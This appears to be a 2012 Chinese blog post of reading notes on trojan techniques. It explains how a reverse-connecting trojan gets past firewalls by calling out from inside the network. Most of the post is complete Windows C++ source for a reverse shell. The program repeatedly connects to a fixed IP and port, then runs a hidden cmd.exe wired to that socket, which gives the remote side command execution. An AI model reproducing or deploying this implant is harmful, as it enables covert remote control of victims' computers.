木马控制技术(一) -- 反弹木马

此为《木马技术揭秘与防御》系列读书笔记


原理比较简单:

“堡垒总是从内部被突破的”,在服务端运行木马,自动连接到指定ip、port的客户端

防火墙对内部发起的连接请求无条件信任,绕过ip包过滤规则


View Code
 1 #include <iostream>
 2 #include <WINSOCK2.H>
 3 #pragma comment(lib,"ws2_32.lib")
 4 #pragma comment(lib,"advapi32.lib")
 5 #pragma comment(lib,"user32.lib")
 6 
 7 using namespace std;
 8 int main()
 9 {
10     WSAData wsaData;
11     SOCKET socket;
12     SOCKADDR_IN sockadd_in;
13 
14     WSAStartup(MAKEWORD(1,1),&wsaData);
15     socket = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
16 
17     char ip[] = "192.168.199.1\x00";
18     unsigned short port = 999;
19     
20     sockadd_in.sin_addr.s_addr = inet_addr(ip);
21     sockadd_in.sin_family  = AF_INET;
22     sockadd_in.sin_port = htons(port);
23 
24     while(connect(socket,(struct sockaddr*)&sockadd_in,sizeof(sockadd_in))){
25         Sleep(30000);
26     }
27 
28     STARTUPINFO si;
29     PROCESS_INFORMATION pi;
30     memset(&si,0,sizeof(si));
31     si.cb = sizeof(si);
32     si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
33     si.wShowWindow = SW_HIDE;
34     si.hStdInput = si.hStdOutput = si.hStdError = (void*)socket;
35     if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi)){
36         cout<<"failed"<<endl;
37         //998:ERROR_NOACCESS 
38         cout<<GetLastError()<<endl;
39     }
40 
41     return 0;
42 }
posted @ 2012-08-10 13:36  handt  阅读(906)  评论(0编辑  收藏  举报